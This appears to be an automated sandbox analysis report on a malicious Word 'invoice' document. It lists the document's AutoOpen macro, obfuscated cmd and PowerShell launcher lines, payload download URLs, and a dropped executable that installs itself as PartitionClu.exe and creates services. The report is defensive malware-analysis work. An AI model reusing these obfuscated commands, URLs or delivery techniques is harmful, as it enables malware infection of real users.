Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmp | String found in binary or memory: http://go
Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmp | String found in binary or memory: http://go.micro
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmp | String found in binary or memory: http://java.com/
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmp | String found in binary or memory: http://java.com/help
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmp | String found in binary or memory: http://java.com/http://java.com/
Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmp | String found in binary or memory: http://li
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmp | String found in binary or memory: http://licensing.microsofH
Source: OSPPSVC.EXE, 00000005.00000002.24909329903.011F0000.00000004.sdmp | String found in binary or memory: http://licensing.microsoft.
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmp | String found in binary or memory: http://n
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmp | String found in binary or memory: http://ns
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmp | String found in binary or memory: http://ns.
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmp | String found in binary or memory: http://ns:
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmp | String found in binary or memory: http://nsj
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://pdesaa.cimaa.pt/zX7y/
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://sammykayfoundation.org/N2AW/
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://sammykayfoundation.org/N2AW/t
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 00000004.00000002.24435930466.01C65000.00000004.sdmp | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmp | String found in binary or memory: http://www.D
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmp | String found in binary or memory: http://www.micros
Source: WINWORD.EXE, 00000001.00000002.24914796217.03340000.00000004.sdmp | String found in binary or memory: http://www.msnusers.comd
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmp | String found in binary or memory: http://www.w3
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmp | String found in binary or memory: http://wwwU
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://zadania.abel.b
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://zadania.abel.bielsko.pl/oL0VnrQ/
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\276299.exe
Contains functionality to start windows services
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E9AA0 StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_003E9AA0

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\PartitionClu.exe | Executable created and started: C:\Windows\System32\PartitionClu.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\276299.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\276299.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\Public\276299.exe | PE file moved: C:\Windows\System32\PartitionClu.exe

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables
Source: INVOICE-ZZIF-145448203429222.doc | Stream path 'Macros/VBA/TGXYfVojZcFmAm' : High entropy of concatenated variable names
Source: INVOICE-ZZIF-145448203429222.doc | Stream path 'Macros/VBA/knhJZowj' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\PartitionClu.exe | Code function: 8_2_003E206F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,8_2_003E206F
Entry point lies outside standard sections
Source: initial sample | Static PE information: section where entry point is pointing to: .rdata
PE file contains an invalid checksum
Source: 276299.exe.4.dr | Static PE information: real checksum: 0x1000 should be: 0x21176
PE file contains sections with non-standard names
Source: 276299.exe.4.dr | Static PE information: section name: .CODE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\276299.exe | Code function: 6_2_00421160 push ss; iretd 6_2_0042116D
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E1160 push ss; iretd 7_2_003E116D
Source: C:\Windows\System32\PartitionClu.exe | Code function: 8_2_003E1160 push ss; iretd 8_2_003E116D
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E1160 push ss; iretd 9_2_003E116D

Spreading:

Creates COM task schedule object (often to register a task for autostart)
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

System Summary:

Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: INVOICE-ZZIF-145448203429222.doc | OLE, VBA macro line: Sub AutoOpen()
Document contains an embedded VBA macro which may execute processes
Source: INVOICE-ZZIF-145448203429222.doc | OLE, VBA macro line: Application.Run "XdYnIfiqNSKFsn", cfipuRzErTzb
Source: INVOICE-ZZIF-145448203429222.doc | OLE, VBA macro line: CreateObject(diiXiviE).Run RzhXfzV + Chr(VBA.vbKeyC) + qwCZwGU + jsNYYhQzcFzVk + DKBElXs, vbHide
Document contains an embedded VBA macro with suspicious strings
Source: INVOICE-ZZIF-145448203429222.doc | OLE, VBA macro line: CreateObject(diiXiviE).Run RzhXfzV + Chr(VBA.vbKeyC) + qwCZwGU + jsNYYhQzcFzVk + DKBElXs, vbHide
Document contains an embedded VBA with hexadecimal encoded strings
Source: INVOICE-ZZIF-145448203429222.doc | Stream path 'Macros/VBA/knhJZowj' : found hex strings
Dropped file seen in connection with other malware
Source: Joe Sandbox View | Dropped File: C:\Users\Public\276299.exe 8B4474C158BA807B261CA28028FFE8549084577F9F02F9A8C757E03995C18D19
Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 66.198.240.37 80
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\276299.exe
Very long command line found
Source: unknown | Process created: Commandline size = 6337
Source: unknown | Process created: Commandline size = 5748
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: Commandline size = 6337
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5748
Creates mutexes
Source: C:\Windows\System32\PartitionClu.exe | Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\Public\276299.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Source: C:\Users\Public\276299.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\PartitionClu.exe | Mutant created: \BaseNamedObjects\M14EB25D6
Source: C:\Users\Public\276299.exe | Mutant created: \Sessions\1\BaseNamedObjects\MB1508E3F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Detected potential crypto function
Source: C:\Users\Public\276299.exe | Code function: 6_2_00422F2A
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E2F2A
Source: C:\Windows\System32\PartitionClu.exe | Code function: 8_2_003E2F2A
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E2F2A
Document contains embedded VBA macros
Source: INVOICE-ZZIF-145448203429222.doc | OLE indicator, VBA macros: true
PE file contains executable resources (Code or Archives)
Source: 276299.exe.4.dr | Static PE information: Resource name: RT_VERSION type: VAX COFF executable not stripped - version 79
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\PartitionClu.exe | File read: C:\Windows\System32\drivers\etc\hosts
PE file contains an invalid data directory
Source: 276299.exe.4.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x1fff address: 0x0
Classification label
Source: classification engine | Classification label: mal100.evad.expl.troj.winDOC@13/8@2/6
Contains functionality to create services
Source: C:\Users\Public\276299.exe | Code function: CreateServiceW,7_2_003E9908
Source: C:\Windows\System32\PartitionClu.exe | Code function: CreateServiceW,9_2_003E9908
Contains functionality to enum processes or threads
Source: C:\Windows\System32\PartitionClu.exe | Code function: 8_2_003E220F CreateToolhelp32Snapshot
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E9A6A GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$VOICE-ZZIF-145448203429222.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRF490.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: INVOICE-ZZIF-145448203429222.doc | OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: INVOICE-ZZIF-145448203429222.doc | OLE document summary: edited time not present or 0
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: INVOICE-ZZIF-145448203429222.doc | virustotal: Detection: 49%
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\INVOICE-ZZIF-145448203429222.doc
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAANgA3ADUAMwAxADAAYwAwAGQANwA5ADkAOQA5AGQAZgA3AGIAMQBmAGEANQBiADIANgA0AGYAYwAzADEAMABiADIANQAwADUAZgAxADMAMwBlADgAMQBmADMANwA1AGIAZQBlADEAYgAyADgAOAA0ADEAOAA1AGQAYgAzADQAMAA3AGYANQAyAGYAOQA1ADgAMwBhADUANgA4AGIAMwA2ADMAYQA5ADYANABiADMANAA5ADcAMAA4ADIAYwA0AGQANQAxAGIAMQBhADUAYgAxAGEAYgBhAGQANwBhAGUAOAA5ADEAMwAwADkAOQA5ADQANABjADIAMwBiADQAYwAwADUAMQBlADAAOAA0AGMAYwA0ADgAOQBhAGIAYgBjADcAYgBjADIAOAA4ADcAMQBhAGUANAAyAGYAYwBjAGUAYgAxADIANgAyADcAMQA3AGUANAA5ADAAZAA0ADcAMABlADcAMgBkADkAYgBhADIANQBmADAAYgA4AGMANABiADMAOABmADEAOABlADQAMQAxAGQAZAAzAGQAZABjAGYAMQBiAGQ
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: unknown | Process created: C:\Users\Public\276299.exe 'C:\Users\Public\276299.exe'
Source: unknown | Process created: C:\Users\Public\276299.exe C:\Users\Public\276299.exe
Source: unknown | Process created: C:\Windows\System32\PartitionClu.exe C:\Windows\system32\PartitionClu.exe
Source: unknown | Process created: C:\Windows\System32\PartitionClu.exe C:\Windows\system32\PartitionClu.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\276299.exe 'C:\Users\Public\276299.exe'
Source: C:\Users\Public\276299.exe | Process created: C:\Users\Public\276299.exe C:\Users\Public\276299.exe
Source: C:\Windows\System32\PartitionClu.exe | Process created: C:\Windows\System32\PartitionClu.exe C:\Windows\system32\PartitionClu.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.24443785646.04070000.00000002.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb* source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: ystem.pdbY source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: C:\Users\Public\276299.exeF\??\C:\Users\Public\276299.exepne.Identifiervapi32-l2-1-0.dllel-advapi32-l2-1-0.dllSystem.Management.Automation.pdbtion.ni.dll source: powershell.exe, 00000004.00000002.24428171411.00010000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000004.00000002.24435307070.01905000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbpdb source: powershell.exe, 00000004.00000002.24435519402.01A3D000.00000004.sdmp
Document has a 'category' value indicative for goodware
Source: INVOICE-ZZIF-145448203429222.doc | Initial sample: OLE document summary category = Gijoro
Document has a 'subject' value indicative for goodware
Source: INVOICE-ZZIF-145448203429222.doc | Initial sample: OLE summary subject = Gijorore

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('76492d1116743f0423413b16050a5345MgB8ADIATwBrAGkAZwAvADcASQBOAGMAUwAvAHMASQBsAFUAUQB5AGUAaABaAEEAPQA9AHwAZgBkADcAMQA2AGYAZAA4AGQAZgBjADAANwA2ADgANgA0ADIANAA2ADQAZAAyAGYAYgAxADEAYQA0ADQAYgAwADEAZQA4ADkAOAA2ADAAOABjADMAZgA1ADAA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( $('
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' sZtnQKPXfin tPnBwwUdwXHCBdzjtJKuOqvuKmaW BmZKpmNbJBbn & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %rMupwtlKItwSVuz%=vSoctSmfSlDXI&&set %EcEPnDFGqliEs%=p&&set %cfipuRzErTzb%=o^w&&set %hIYPuqMRDKImfnp%=bOowOXAzrPZZ&&set %vNtQYdsDuna%=!%EcEPnDFGqliEs%!&&set %PWMpNCalaDaEmbr%=jpNizzqW&&set %XdYnIfiqNSKFsn%=e^r&&set %ijpdjstoGZYzc%=!%cfipuRzErTzb%!&&set %qwCZwGU%=s&&set %PatJHZXiRmCjzSY%=MDHXnkJmjsS&&set %kMRAvAklRLEh%=he&&set %SwZZNuPNYjB%=ll&&!%vNtQYdsDuna%!!%ijpdjstoGZYzc%!!%XdYnIfiqNSKFsn%!!%qwCZwGU%!!%kMRAvAklRLEh%!!%SwZZNuPNYjB%! '( [ruNtIMe.INteRoPSErVicES.mARsHAL]::([RUNTiMe.inTEROpsERVIces.maRShal].GetmEMbeRs()[1].nAME).invoKE( [runtIME.iNTEROPsErvIcES.mARShAl]::sEcurEsTRINGtOgLOBalalLOCaNSi( 